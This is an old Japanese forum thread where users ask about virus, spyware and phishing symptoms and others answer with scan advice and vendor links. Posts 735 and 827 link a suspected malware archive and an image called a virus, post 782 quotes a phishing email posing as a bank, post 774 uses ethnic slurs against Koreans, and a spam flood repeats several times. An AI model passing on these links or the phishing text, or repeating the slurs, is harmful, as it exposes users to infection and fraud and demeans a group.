あと、インターネットをしていると「***に問題が生じました。再起動して、
問題を解決してください。」という画面が頻繁に出てくるようになりました。
あと、動作しなくなり、強制終了を余儀なくされることが多々あります。
これは、ウイルスや、ブラクラといったものなんでしょうか?
そうだとしたらどのように解決したらいいでしょうか?

723 :名無しさん@お腹いっぱい。:03/12/19 14:31
>>722
IEでエロサイトうろつかないことです。

724 :名無しさん@お腹いっぱい。:03/12/19 15:38
ウィルスやブラクラっつーよりスパイウェアっぽいので
スパイウェア予防駆除関連ソフトのスレッド探して、テンプレ熟読のこと。
関連サイトに書いてあることをやれば多分大丈夫。

くれぐれも質問なんかするなよ。
「テンプレ嫁」と一蹴されるからな。

あとは念のためウィルス対策ソフトを導入して、ウィルスチェックもしておけ。
なんか見つかったら駆除(削除)も忘れずに。

対処終了後は>723の言うことを遵守すること。




725 :名無しさん@お腹いっぱい。:03/12/19 19:52
さっきスクリーンセーバー状態にしておいたら
急に電源がぷちっと切れました((((;゚Д゚))))
これってスパイウェアでしょうか?恐らくそうですよね。
まずウイルススキャンをしたいので、スパイウェアも感知できる
おすすめのところを教えていただけないでしょうか。お願いします!

726 :名無しさん@お腹いっぱい。:03/12/19 20:08
>>725
>>1からのテンプレ参照。

727 :725:03/12/19 21:28
>>726
レスありがとうございました。
シマンテックをやってみました。ゼロでした。
でも今度は画面の一部分(数cmくらい横に、細く)ぐらぐら揺れます。
ちなみにこれは結構前からもあったんですが・・・。
ウイルスが無いのにこれっておかしいですか?
メモリ不足と言われることもあるんですが、これは関係ありますか?

すみませんどなたかお願いします。


728 :名無しさん@お腹いっぱい。:03/12/19 21:42
>>727
モニタとPC本体の近くに電磁波出すようなもの置いてない?
本体の方の電源とか不安定じゃないか確認してみ。

ウイルスなど可能性が低いので、次の質問からはPC初心者板にどうぞ。

729 :725=727:03/12/19 22:05
>>728
レスありがとうございます!
はーなるほど・・・今まで電磁波という発想が全然ありませんでした。
とりあえず整理してみたら治まりました。
ほんとありがとうございました!!
はい、次からはPC板に行きます。

730 :名無しさん@お腹いっぱい。:03/12/19 22:28
>>729は近くに何置いてたんだろう。電子レンジ?

731 :名無しさん@お腹いっぱい。:03/12/19 22:46
1にあるSymantecのサイトのウィルス検索開始しても3秒くらいで
チェックの画面から戻ってきてしまうんですが、なぜですか?

732 :名無しさん@お腹いっぱい。:03/12/20 15:27
>>730
電子レンジのマグネトロン管の磁石もたしかに強力だがw…たぶん
磁場漏れまくりの安物のスピーカーだろ。安物のラジカセかも。


733 :名無しさん@お腹いっぱい。:03/12/20 21:57
テレビのリモコンとかじゃねーの?


電磁波ださないかw

734 :名無しさん@お腹いっぱい。:03/12/21 16:10
>>725って電源設定

735 :名無しさん@お腹いっぱい。:03/12/22 22:02
今日いきなりtextファイルが開けなくなったのでnotepad.exeを見てみると、アイコンが違う種類のものになってたので
インストールCDからnotepad.exeを解凍してきて置き換えたのですが
これはウイルスか何か?なんですかね、一応AntiVirというフリーの物を入れてるんですけどまったく反応しないんですよね・・・・
http://up.love-body.com:8000/uploda/source/up20031222220610.rar

736 :名無しさん@お腹いっぱい。:03/12/22 23:03
>>735
アイコンがおかしくなってることに気づいた時点で、ファイルのプロパティの、更新日時をチェックしとくべきだったかも。
もし更新日時がつい最近なら、『何か』に書き換えられた可能性ありだが、
そうでなければ(自分がWinをインストールした日付より前とかなら)、単にファイルが壊れただけとみてよかろうし。

何にしても、レジストリに登録されたアプリケーションを見て、それに自分のコードを埋め込むタイプのウィルスもあるので、
オンラインスキャンするのが吉と思われ。


737 :名無しさん@お腹いっぱい。:03/12/23 02:01
>>735
notepad 18944 でググったら、こんなんヒット。
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.merkur.e@mm.html
ウチも AntiVirなんだが、検知せず。実行はしてない。
あ、18944っていうのは、そのファイルのバイト数ね。

738 :735:03/12/23 10:12
>>736
もうクリックしまくって再起動までしちゃってました(笑)
知識がないって恐ろしいですね、勉強になりますです
>>737
調べていただいてサンクスです、そうやって検索するのか・・・
AntiVirだと検知しないんですかね
でもとりあえずウイルスだとしてもメールに感染する奴でよかったです
なにせメールしないもんで、アドレス帳に一つも登録されてないんですよ。よかったよかった。

739 :(・∀・):03/12/23 17:59
やたらと下記のウイルスで攻撃してくる香具師がいます

(今日1日で何百回の攻撃。ファイアーウォールログによる。)

どうせ外人だろうがipアドレスさらしていいですか

↓ウイルス名
RPC_DCOM_BUFFER_OVERFLOW

740 :名無しさん@お腹いっぱい。:03/12/23 18:11
>>739
http://pc.2ch.net/test/read.cgi/sec/1065964513/

741 :名無しさん@お腹いっぱい。:03/12/23 23:58
すみません、お分かりになる方教えてください。
数時間前からIEの表示がおかしいです。
タイトルバーだけで表示されて画面が消えて(透明化?)しまいました。
タイトルバーをダブルクリックしてIEの画面を最大化すると画面表示できるのですが
画面を縮小すると再びタイトルバーのみになってしまいます。
このような現象はIEのみで、メーラーやメモ帳などは普通です。

IEに勝手にウィンドウシェード機能を追加するウィルスってあるんでしょうか?
当方WINXP、IEは自動アップデートで最新版、ノートンアンチウィルス最新版でスキャンしましたが感染はみつかりませんでした。



742 :zxc:03/12/24 00:24
アウトルック6.0使用しています。
なんか急にへんなメールが大量に来るようになりました!
1分間で100通以上 今も止まらず着ています!!
どうすればブロックまたは解除できますか?
詳しい方教えてくださいm(_ _)m

http://rank.server.ne.jp/gazou/cgi-bin/img-box/img20031224001737.jpg

このサイトで zxc で投稿しています↓
http://rank.server.ne.jp/gazou/cgi-bin/imgboard.cgi



743 :トウシロウ:03/12/24 00:34
PC初心者です。友人のPCが「W32.Welchia.Worm」に感染されました。
Symantecのノートン2004で駆除できますか?
Symantecの無償駆除ツールで試してみましたが、失敗しました。
ノートン2004で駆除できるようなら、早速購入しようと思います。
XPホームエディションです。

744 :名無しさん@お腹いっぱい。:03/12/24 00:44
ノートンアンチウィルス2000は、
WinXPに正式には対応してませんが、
使えるか、どうか、どなたかご存知ありませんか?



745 :741:03/12/24 00:46
自己解決しました、当方の単純な操作ミスが原因でした。
お騒がせいたしました<m(__)m>

746 :名無しさん@お腹いっぱい。:03/12/24 01:13
ノートンかウィルスバスターのどちらかを導入しようと思っているのですが、どちらの方がお勧めでしょうか?
どちらも機能は似たり寄ったりのようなので、動作が軽いとか定義ファイルの更新が早いとかを目安にしたいと思うのですが。。。
よろしくお願いします。

747 :名無しさん@お腹いっぱい。:03/12/24 01:59
>>746
どう考えたってバスター2004

748 :名無しさん@お腹いっぱい。:03/12/24 02:30
>>743
駆除はできると思うけどMSのパッチを当てないことにはまた感染するかと。
http://pc.2ch.net/test/read.cgi/sec/1065964513/l50
http://www.symantec.com/region/jp/sarcj/data/w/w32.welchia.worm.html

>>744
使ってみれば?

>>746
両社とも体験版を出してるはずなので自分で確認するのが一番かと。

749 :名無しさん@お腹いっぱい。:03/12/24 03:02
>>747
どう考えたんですか?

>>748
なるほど〜。では体験版で確認してみようと思います。
ありがとうございます。。

750 :名無しさん@お腹いっぱい。:03/12/24 05:41
ちょいと失礼しますね。

昨日から、IEの特定のページでエラー落ちするわ、
ホームページがWebCoolSearchなるサイトに書き換えられたりして困っています。

ウィルスだと思って、オンライン検索・体験版DLして検索してみたものの、
感染しているといった結果ではありませんでした。

これって、ウィルス関連なのでしょうか?
お教え頂ければ幸いです。

751 :名無しさん@お腹いっぱい。:03/12/24 07:30
>>750
ウィルスと言えばウィルスだけどスパイウェア駆除ソフトを試してみては?


752 :名無しさん@お腹いっぱい。:03/12/24 08:01
変な挙動起こしたら必ずウィルスとスパイウェア両方検索すべし。

753 :名無しさん@お腹いっぱい。:03/12/24 08:45
>>749
Norton2004ユーザー:DoCoMoユーザー(自分が使ってるのが最良の選択だと信じて疑わない)
ウイルスバスター2004ユーザー:auユーザー(初心者はなんとなく選択、上級者は他のソフトと比較して選択)
McAfeeユーザー:Vodafoneユーザー(海外シェアやHotmailで採用などの点から選択)
その他のユーザー:Tu-kaユーザー(我が道に拘る)

ウイルスセキュリティ2004ユーザー:プリペイド携帯ユーザー(安いと思ってるだけで本質を理解していない)

754 :名無しさん@お腹いっぱい。:03/12/24 15:14
musirc4.72.exeからW32.Randex.genが検出されました。
ファイルは削除されました。

とノートン先生が5分おきくらいにおっしゃっているのですが
原因のファイルは何かご存知の方いますか?

755 :名無しさん@お腹いっぱい。:03/12/24 19:24
>>744
XPに対応しているかどうかという問題ではなく、ウイルス定義ファイル更新
(購読)サービスが終了していると思う。
新しいVirusに対応できないウイルス対策ソフトを入れても、役に立たないと
思うが。
http://www.symantecstore.jp/virusfire.asp


756 :名無しさん@お腹いっぱい。:03/12/25 05:27
起動する度に nstask32 を勝手に検索しだすのですが(しかも即効見つかりませんて出る)
ウイルスでこんな症状になるのでしょうか?
それとも重要な物を消しちゃったのかな・・・・・

757 :名無しさん@お腹いっぱい。:03/12/25 17:14
>>754
んなもんしるか。ダウソ板の方が詳しいだろ。

758 :名無しさん@お腹いっぱい。:03/12/25 18:32
ウィルスバスター2004のパーソナルファイヤーウォールを
除いたものと、ノートンインターネットセキュリティー2004の
アンチウィルスを除いたものを同時にインストールしても狭隘問題等
は起きませんか?

759 :名無しさん@お腹いっぱい。:03/12/25 18:42
>>758
すみません正しくは、
ウィルスバスター2004のパーソナルファイヤーウォールを
除いたものと、ノートンインターネットセキュリティー2004の
アンチウィルスを除いたものを同時にインストールしても正常
に動作しますか?
です。


760 :名無しさん@お腹いっぱい。:03/12/25 19:27
質問、というか相談です。
実は行きつけのスレがウイルス(Loveletter)に感染しているらしくて、
当方ホットゾヌを使用しているのですが、ログが削除されてしまいます。
IEで表示する分には、ノートン先生は反応しません。

ちなみにソフト板某年賀状ソフトのスレです。
見たところ初心者さん半分なので、変に不安をあおらない方がよいのかも、と思い、
200レスほど経過させてしまいました(゚∀゚ )

スレの住人の人たちは誰も気づいてないみたいですが、
言ってあげた方がいいのでしょうか、少々迷うところです。

761 :名無しさん@お腹いっぱい。:03/12/25 19:47
>>760
学級委員さん、もう冬休みじゃないの?

762 :760:03/12/25 19:55
>>761
ふ、冬厨と間違われてる!? ガ━━(゚Д゚;)━━━ン!!
いや、馬鹿にされるの覚悟で聞いてるんですが…

763 :名無しさん@お腹いっぱい。:03/12/25 20:00
>>762
(・∀・)ニヤニヤ

764 :名無しさん@お腹いっぱい。:03/12/25 20:02
>>762
言わないでおけ。誰かが騒ぎだしたら教えてやれ。

765 :760:03/12/25 20:13
>>764
(´Д⊂グスン
何かわからないけど感動しますた…ありがとうです

766 :ぼるじょあ ◆yBEncckFOU :03/12/25 20:26
>>765
(・3・) エェー 幸せな人生だNA〜チクショ〜

767 :名無しさん@お腹いっぱい。:03/12/26 01:45
すみません、質問させてください。
最近対応していない拡張子のものだと、
全て同じ、知らない男性の顔が表示されるんです。
これってウイルスなんでしょうか・・・?
すごく怖いので原因を教えてください・涙

768 :名無しさん@お腹いっぱい。:03/12/26 02:41
>>767
眼鏡掛けたオタクっぽい香具師か?w

769 :名無しさん@お腹いっぱい。:03/12/26 12:39
>>767
【警報】Winnyを狙ったワーム・ウイルス情報 Part7
ttp://tmp2.2ch.net/test/read.cgi/download/1068654569/

770 :名無しさん@お腹いっぱい。:03/12/27 00:49
すいません。
なんかco.krのアドレスにいくとPCがガリガリいって必ず止まります。
オンラインスキャンかけると必ず途中で止まります。
こういう類のウイルスってありますか。

771 :名無しさん@お腹いっぱい。:03/12/27 00:53
そうです・・・メガネの男の人です・汗
ありがとうございました。これを見て対処します!

772 :名無しさん@お腹いっぱい。:03/12/27 02:31
お〜い、山田君、通報しといて

773 :名無しさん@お腹いっぱい。:03/12/27 13:06
>>770
韓国ウィルス

774 :名無しさん@お腹いっぱい。:03/12/27 16:58
>>770
馬鹿チョンウィルス
キムチマスターズ

775 :名無しさん@お腹いっぱい。:03/12/28 16:33
このネットワークでもPCでもないのですが
TrendMicroのオンラインスキャンでチェックしたら
「WORM_KLEZ.H」が16個検出され、感染ファイルは74個との事でした。
オンラインスキャン上からは削除できないですが
ファイルの場所は表示されているので
こちらをひとつずつ探して手動で削除していけばいいのでしょうか?
実行していないからなのか
「<Windowsのシステムディレクトリ>¥WINK*.exe(「*」は無作為な文字列)
はありませんでした。


776 :名無しさん@お腹いっぱい。:03/12/28 21:31
会社のPC(win2000 SP4)なのですが
起動時にsvchost.exeがCPU使用率99%になってしまいます。
ノートンのlast update 03/12/24でスキャンしてみても見つかりませんでした。
会社が今は休みのためしばらく確認は出来ないのですが、
疑わしいものがあれば教えてください。


777 :名無しさん@お腹いっぱい。:03/12/28 23:45
未発見のセキュリティーホールなどを使って作られる、対応の施しようがないウィルスって
なんていうんだっけ?
ゼロウィルス?見たいな名前だった気が。

778 :名無しさん@お腹いっぱい。:03/12/29 10:06
>>777
"0-day exploit"のことかな。ぐぐってちょ。
これを応用したウィルスに名前がついてたかどうかは漏れは知らん。

779 :名無しさん@お腹いっぱい。:03/12/30 07:04
yahooなどの検索サイトが使えなくなるウイルスってありますか?
入れるサイトと入れないサイトがあるのでつ、オンラインスキャンは無理でした

780 :必死な初心者:03/12/30 10:28
はじめまして、パソコン初心者です

いつのまにやら私のPCがラブレターというウイルスに感染してしまい
インターネットブラウザを開いてると外国の変なサイトをかってに開かれてしまいます
アンチウイルスのソフトは入っているのですが、ウイルスを発見しただけで
修復できません、と言われてしまいます、どうしたらいいのでしょうかm(__)m
おしえてください

781 :名無しさん@お腹いっぱい。:03/12/30 11:32
まず確認。
本当に感染しているのか?
(ていうか、いまどきの対策ソフト常駐させてりゃ、まず感染しないと思うのだが)
Nortonの誤警告とか、持ってるファイルが感染しているだけで
マシンは何ともない、なんてことはないか?
(この場合は多分感染ファイル捨てればいいと思うけど)
あと、ヘンなサイトが開くのは本当にウィルスのせい? スパイウェアのチェックはした?

もしも「ほんとうに感染」してるなら、使ってるウィルス対策ソフトメーカーのサイトに
ウィルス辞典みたいなページがあるだろうから、そこで検出名をキーワードに検索
出てきたページに書いてある対処法を実行。

782 :名無しさん@お腹いっぱい。:03/12/31 00:01
はじめまして。
以下のようなメールが送られてきました。
宛名には心当たりが無く、みずほ銀行らしい名前の「@yahoo.co.jp」から届いていますが
かなり怪しい感じです。
添付にワード文書が付いています。
恐らく、これを開くと感染しそうです。
みなさんのところには、こんな怪しいメール届いていませんか?



>高○ ○子さま:口座パスワード確認

>ご口座のパスワードは添付の中にあります。
>ホームページからインターネットバンキングを利用する部屋に入るための鍵のような
>役割をします。忘れないようにしっかり覚えてください!何回か間違って入力する
>と、取引ができなくなりますのでご注意を!
>何かわからないことがあればどんどん聞いてください。
http://www.mizuhobank.co.jp/
>ここから、インターネットバンキングに入る!

>                   みずほ銀行


>・年末年始の営業のご案内
>・注目の低金利 年3.475% みずほ教育ローン金利優遇キャンペーン
>・円定期3ヵ月が年利率1.3%、外貨定期または投資信託と同時申し込みで
>・外貨定期は豪ドル年率10.0%、ユーロ年率4.0%、米ドル年率3.0%の特別金利
>・期間限定 新築・借り換え専用住宅ローン『みずほスーパーセレクト』取扱開始
>・<みずほ>の住宅ローン、最長10年間0.7%の金利優遇キャンペーン


783 :名無しさん@お腹いっぱい。:03/12/31 00:46
ああ、135を叩く馬鹿が多いい。
まだ、MS−BLASTERに感染してるDOQいるのかよ

784 :名無しさん@お腹いっぱい。:03/12/31 16:35
ある日PCを起動したらBIOSによるドライブ判定の後、ブートを
CD→HDDでやったところ、HDDの読み込み開始で停止してしまいました、
念のためHDD→CDで起動してみたところ、次のCDドライブを読みにいかず
止まってしまいます。原因はHDDだと思いますが、こういった症状の発生する
ウィルスは現在存在するでしょうか?
物理的故障のことも考え検討しているところです。

785 :名無しさん@お腹いっぱい。:03/12/31 17:21
>>784
通常ハードウェアを疑うと思う

786 :名無しさん@お腹いっぱい。 :03/12/31 18:20
W32.Pinfiってウィルスの駆除は、
やはり市販ツールか再インストじゃ無いとダメなんですか?

787 :名無しさん@お腹いっぱい。:03/12/31 19:17
>>786
なんでそんなウイルスに感染したの?

んで駆除に関しては、EXEファイルとSCRファイルに感染するタイプのようなので、
駆除ツールでは限界があるかもしれないし、市販のウイルス対策ソフトを使った
としても駆除しきれないファイルがあるかもしれない。駆除しきれないファイルの
場合は削除するしかないのだが、EXEファイルなので削除してしまうと何らかの
アプリに影響を与える可能性もあるわけで、最悪の場合OS再インストになると思われる

788 :名無しさん@お腹いっぱい。:03/12/31 19:19
>>783
> ああ、135を叩く馬鹿が多いい。
> まだ、MS−BLASTERに感染してるDOQいるのかよ

どぉーきゅぅー

789 :名無しさん@お腹いっぱい。:03/12/31 19:48
さて、ナチはもうそろそろ・・・・
問題の1月1日がやってまいります。

ダイヤルアップの方でも、OSのパッチ当てと、ワクチンソフトのUpdateはやっておきましょうね。


790 :名無しさん@お腹いっぱい。:03/12/31 21:55
Troj/Digits.Aってどんな活動するのでしょうか?
いきなりnotepad.exeがMEDIAROAD.EXEに書き換えられまい
ノートパッド、メモ帳が使用出来なくなりました。

ファイル名はnotepad.exeのまま、プロパティ>バージョン情報では
MEDIAROAD.EXEになっています。
具具っても日本語の結果が出ず、分かりません。

当方、バスター2004、ウィルス検索結果異常なし。
シマンテックのオンラインウィルススキャンで
C:\WINDOWS\Application Data\Microsoft\OfficeExcel10.dll
C:\WINDOWS\notepad.exe
にTroj/Digits.A発見。

現在は、C:\Windows\Options\Cabs からnotepad.exeを抽出して
WINDOWSフォルダに放り込んでノートパッドは正常に動いています。

WinMeです。



791 :名無しさん@お腹いっぱい。:03/12/31 22:00
>>782
イギリスでもこんなのが。
http://www.mainichi.co.jp/news/flash/keizai/20040101k0000m020028000c.html
英中央銀行のイングランド銀(BOE)を装った偽りの電子メールが金融機関や個人に
多数送られていたことが30日発覚した。

792 :名無しさん@お腹いっぱい。:03/12/31 23:37
ブラクラみたいにいきなり延々ブラウザが立ち上がります。
IE立ち上げてないのに勝手に開きだすんで困ってます。
これってウイルスでしょうか?
今もいつ立ち上がるのか冷や冷やしながら書き込みしてます。

793 :名無しさん@お腹いっぱい。:04/01/01 00:04
>792
ウィルスチェックとスパイウェアのチェックをしてから出直してこい。
話はそれからだ。

794 :792:04/01/01 00:06
ウイルスチェック済みです。
さっきもやっぱり開いて再起動しました。
丁度昨日の今頃から起こりだしてもう何がなんだかわかりません

795 :793:04/01/01 00:14
>794
ウィルスは検出しなかったんだな。じゃあその旨質問時に明記すること。

あと、もう一度聞くが、スパイウェアのチェックはしたか?
してないならするように。できれば複数の対策ソフトで。
方法がわからないなら、このスレのログと関連スレを熟読すること。


796 :名無しさん@お腹いっぱい。:04/01/01 00:19
ではスパイウェアでは?
【雑談禁止】スパイウェア削除ソフトSpybot 9
http://pc.2ch.net/test/read.cgi/sec/1070732338/
ここのテンプレ読んでスパイボットを使ってみては?

質問するときはOSとか色々具体的情報を書かないとこれ以上レスのつけようがない。
よくわからないのなら時間は掛かるがOS再インストール(メーカー製PCならリカバリ)してみては。

797 :名無しさん@お腹いっぱい。:04/01/01 00:22
スパイボット以外のソフト(スパイボットと併用可能)
Ad-aware
本家サイト
http://www.lavasoft.nu/
本家日本語サイト
http://www.lavasoft.nu/default.shtml.ja
日本語化パッチ製作の神のサイト
CnsMin Remover (CnsMin 除去用ファイル)も置いてあります。
http://bdc.s15.xrea.com:8080/flight/
AD-aware について解説
http://www8.ocn.ne.jp/%7Evanish2/nettune/spy.html
Ad-aware 6.0によるスパイウェアの除去方法
http://higaitaisaku.web.infoseek.co.jp/adaware.html

798 :792:04/01/01 00:50
ご親切にありがとうございました。
spyボットでスキャンしてみた所、なんとか乱発は収まりました。
しかし確実には消せてないようなんです。(出そうになるけど収まったり、数個出てき止まる)

799 :792:04/01/01 00:52
OSはXPです。
出てくるURLはhttp:gf750.com〜みたいな感じでその都度数字が変わります。

AD-awareでも試してみます。

800 :名無しさん@お腹いっぱい。:04/01/01 02:35
やれるだけやってみて、
それでもおかしい様でしたら、
>>796にもありますように
OS再インストール(あるいはリカバリ)した方がいいと思います。
正月早々大変ですね。お正月休みを利用してがんばってください(お正月休みがない立場の方でしたらごめんなさい)。
もし、OS再インストール(あるいはリカバリ)しなくて解決したら、XPの復元ポイントを削除しないと、
おかしなものも復元されてしまう可能性が残りますので、なおった時点よりも古い復元ポイントは削除してください。

801 :名無しさん@お腹いっぱい。:04/01/03 06:45
HTML_SUAR

こいつを削除したいのですが
やり方がわからないので教えてください。


802 :名無しさん@お腹いっぱい。:04/01/03 07:00
>>801
IEのキャッシュをクリア

803 :作者:04/01/04 15:30
>>473
ものすごい遅レスですいません。
>MBRS011 Geometry was not saved. Assuming HH = FF, SS = 3F
>MBRS005 Geometry was not saved. Free space after 044F1894 is unknown.
>MBRSCANではエラーはあとこれ↑が出ました。ジオメトリが。。。(泣いちゃだめだ。。)
これバグでした。LBAモードでジオメトリの取得が、うまくいったりいかなかったりしているのは、以前から気づいていたのですが、この一連のスレッド読んでいるうちに単純なミスに気づきました。近いうちに MBRSCAN V1.12 をリリースしますのでよろしく。



804 :名無しさん@お腹いっぱい。:04/01/05 10:50
レス違いだったらすみません。
今ものすごく困っています。
画面右上の最大・最小・閉じるのところやスクロールして選択するところに
小さな数字が出現してます。(6が多いです)
クリックして選択するところは、マークが滲んだみたいに変わりました。
そしてIMEパッドの中の文字すべてがおかしいです。
うまく説明できなくて申し訳無いです。
ウイルス駆除はしました。
いったいどうすればよいのでしょうか?



805 :804:04/01/05 11:02
レス違い→スレ違い

806 :名無しさん@お腹いっぱい。:04/01/05 11:07
(・∀・)クスクス
http://homepage2.nifty.com/winfaq/fontstrouble.html

807 :804:04/01/05 13:45
>>806
レスありがとう。
直ったよん。
いや〜あせった^^;

808 :名無しさん@お腹いっぱい。:04/01/05 14:35
>>807
まぁこいつ↓の肛門に感謝するんだな。

809 :名無しさん@お腹いっぱい。:04/01/05 15:14
TCP:80のログが無くなりなしたね
全体的に軽くなった?

810 :名無し:04/01/05 22:37
御願いします教えてください!!
インターネットをやっていたら変なサイトが出てきたんです。それ以来最初に開くサイトがいつもは標準サイトの
プロバイダーなんですが、その変なサイトが出てきていらい「http://www.coolsearch.com」ここに
飛んでしまいます。  設定で標準サイトにしようとすると「http://t.rack.cc/h.php?aid=35」これが
書いてあります。いくら直してもパソコンを消すと、元に戻っています。
何故でしょう?教えてださい御願いします。

811 :  :04/01/05 22:46
>>810
とりあえず、スパイウェアのチェックと削除をしてみては?

812 :名無し:04/01/05 22:48
それはどういうことですか?
それからIEとは何ですか?
すいませんが教えてください。

>811

813 :名無しさん@お腹いっぱい。:04/01/05 23:02
>>812
【雑談禁止】スパイウェア削除ソフトSpybot 9
http://pc.2ch.net/test/read.cgi/sec/1070732338/

スパイウェア発見専用ソフト「Ad-aware」Part9
http://pc.2ch.net/test/read.cgi/sec/1071914621/

IE=Internet Explorer

814 :IEにURLを偽装できるパッチ未公開の脆弱性が発見される:04/01/06 00:19
IEにURLを偽装できるパッチ未公開の脆弱性が発見される
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/12.html#20031211_IE

NAI VirusScan のウィルス定義ファイル 4311 以降で、この欠陥に対応されている。
http://www.nai.com/japan/

Exploit-URLSpoof
http://www.nai.com/japan/security/virE.asp?v=Exploit-URLSpoof

こんな感じで表示される:
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/0105-exploit-urlspoof.jpg



815 :名無しさん@お腹いっぱい。:04/01/06 00:19
>>810
http://higaitaisaku.web.infoseek.co.jp/menu5.html
ここを読んで勉強し、

http://higaitaisaku.web.infoseek.co.jp/removetrackcc.html
この詳細を読んで対策すべし。

ていうかエロサイト巡回するなハゲ!

816 :Download.Trojan:04/01/06 15:09
Download.Trojan

セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

[Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.01/msg00011.html
http://www.malware.com/

817 :Download.Trojan:04/01/06 15:10
ファイルを分析しました。
送られたそれぞれのファイルについてわかったことを以下に報告します。
結果: デベロッパーノートを参照してください。
結果:このファイルは次のウィルスに感染しています:
Download.Trojan

デベロッパーノート:
This archive contains malicious code. Any malicious contents will be detected by NAV
if they are extracted from the archive. Please delete this file.
***html is non-repairable threat. NAV with the latest beta definition detects this.
Please delete this file and replace it if neccessary. Please follow the instruction
at the end of this email message to install the latest beta definitions.
This file is contained by ***

***.html will download a Trojan dropper to your system when running.
NAV with the latest beta definition detects this. Please delete this file
and replace it if neccessary. Please follow the instruction at the end of
this email message to install the latest beta definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスは
ウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。

(C)2004 シマンテック・セキュリティ・レスポンス
(P)2004 シマンテック・セキュリティ・レスポンス

818 ::04/01/06 15:34
ニュー山崎渉板(ズーイー板)
http://k1wcw.com/
山崎信者の憩いの場ズーイーさんと騙ろう
http://k1wcw.com/test/read.cgi/main/1071950603/
∧_∧
(  ^^ )<
ヒキがこの世に居るって本当ですか?(^^)
山崎渉板が荒らしに汚染されたので(山崎渉信者ズーイー)改め
(ズーイー)がニュー山崎渉板を作りますた
孤独なおまいらにお年玉じゃぼけ


819 ::04/01/06 15:35
ニュー山崎渉板(ズーイー板)
http://k1wcw.com/
山崎信者の憩いの場ズーイーさんと騙ろう
http://k1wcw.com/test/read.cgi/main/1071950603/
∧_∧
(  ^^ )<
ヒキがこの世に居るって本当ですか?(^^)
山崎渉板が荒らしに汚染されたので(山崎渉信者ズーイー)改め
(ズーイー)がニュー山崎渉板を作りますた
孤独なおまいらにお年玉じゃぼけ


820 ::04/01/06 15:35
ニュー山崎渉板(ズーイー板)
http://k1wcw.com/
山崎信者の憩いの場ズーイーさんと騙ろう
http://k1wcw.com/test/read.cgi/main/1071950603/
∧_∧
(  ^^ )<
ヒキがこの世に居るって本当ですか?(^^)
山崎渉板が荒らしに汚染されたので(山崎渉信者ズーイー)改め
(ズーイー)がニュー山崎渉板を作りますた
孤独なおまいらにお年玉じゃぼけ


821 ::04/01/06 15:36
ニュー山崎渉板(ズーイー板)
http://k1wcw.com/
山崎信者の憩いの場ズーイーさんと騙ろう
http://k1wcw.com/test/read.cgi/main/1071950603/
∧_∧
(  ^^ )<
ヒキがこの世に居るって本当ですか?(^^)
山崎渉板が荒らしに汚染されたので(山崎渉信者ズーイー)改め
(ズーイー)がニュー山崎渉板を作りますた
孤独なおまいらにお年玉じゃぼけ


822 ::04/01/06 15:36
ニュー山崎渉板(ズーイー板)
http://k1wcw.com/
山崎信者の憩いの場ズーイーさんと騙ろう
http://k1wcw.com/test/read.cgi/main/1071950603/
∧_∧
(  ^^ )<
ヒキがこの世に居るって本当ですか?(^^)
山崎渉板が荒らしに汚染されたので(山崎渉信者ズーイー)改め
(ズーイー)がニュー山崎渉板を作りますた
孤独なおまいらにお年玉じゃぼけ


823 ::04/01/06 15:37
ニュー山崎渉板(ズーイー板)
http://k1wcw.com/
山崎信者の憩いの場ズーイーさんと騙ろう
http://k1wcw.com/test/read.cgi/main/1071950603/
∧_∧
(  ^^ )<
ヒキがこの世に居るって本当ですか?(^^)
山崎渉板が荒らしに汚染されたので(山崎渉信者ズーイー)改め
(ズーイー)がニュー山崎渉板を作りますた
孤独なおまいらにお年玉じゃぼけ


824 ::04/01/06 15:37
ニュー山崎渉板(ズーイー板)
http://k1wcw.com/
山崎信者の憩いの場ズーイーさんと騙ろう
http://k1wcw.com/test/read.cgi/main/1071950603/
∧_∧
(  ^^ )<
ヒキがこの世に居るって本当ですか?(^^)
山崎渉板が荒らしに汚染されたので(山崎渉信者ズーイー)改め
(ズーイー)がニュー山崎渉板を作りますた
孤独なおまいらにお年玉じゃぼけ


825 ::04/01/06 15:38
ニュー山崎渉板(ズーイー板)
http://k1wcw.com/
山崎信者の憩いの場ズーイーさんと騙ろう
http://k1wcw.com/test/read.cgi/main/1071950603/
∧_∧
(  ^^ )<
ヒキがこの世に居るって本当ですか?(^^)
山崎渉板が荒らしに汚染されたので(山崎渉信者ズーイー)改め
(ズーイー)がニュー山崎渉板を作りますた
孤独なおまいらにお年玉じゃぼけ


826 ::04/01/06 15:38
ニュー山崎渉板(ズーイー板)
http://k1wcw.com/
山崎信者の憩いの場ズーイーさんと騙ろう
http://k1wcw.com/test/read.cgi/main/1071950603/
∧_∧
(  ^^ )<
ヒキがこの世に居るって本当ですか?(^^)
山崎渉板が荒らしに汚染されたので(山崎渉信者ズーイー)改め
(ズーイー)がニュー山崎渉板を作りますた
孤独なおまいらにお年玉じゃぼけ


827 :名無しさん@お腹いっぱい。:04/01/06 18:20
このウィルス踏んじゃったんですが、どうすればよいでしょうか?
ttp://www2.strangeworld.org/uedakana/sahra0002.jpg


828 :名無しさん@お腹いっぱい。:04/01/06 18:48
>>827
リカバリしかない

829 :名無しさん@お腹いっぱい。:04/01/06 18:55
極悪な物踏んだね。

830 :名無しさん@お腹いっぱい。:04/01/06 19:13
>>827
ちょっと遅い大掃除になったな(ワラ

831 :名無しさん@お腹いっぱい。:04/01/06 20:04
>>827
私も踏みました 
NAが検知してたけど削除したのかな?
再起動かけてなんとも無いですが
どういう症状になてますか?

832 :名無しさん@お腹いっぱい。:04/01/06 20:44
>>831
画像ウイルスなんですか?

833 :名無しさん@お腹いっぱい。:04/01/07 00:22
ボクのパソコンは勝手にhttp://ads.revenue.net/media/ads/browsercleanser_001.phtml?blur=1&
の画面がデスクトップに開かれます。
どうすれば治るのでしょう?
ウイルスなのでしょうか?

834 :名無しさん@お腹いっぱい。:04/01/07 02:47
>>833
http://pc.2ch.net/test/read.cgi/sec/1071366174/940n

835 :名無しさん@お腹いっぱい。:04/01/07 08:50
質問です。
http://www.symantec.com/region/jp/sarcj/data/w/w95.mtx.html
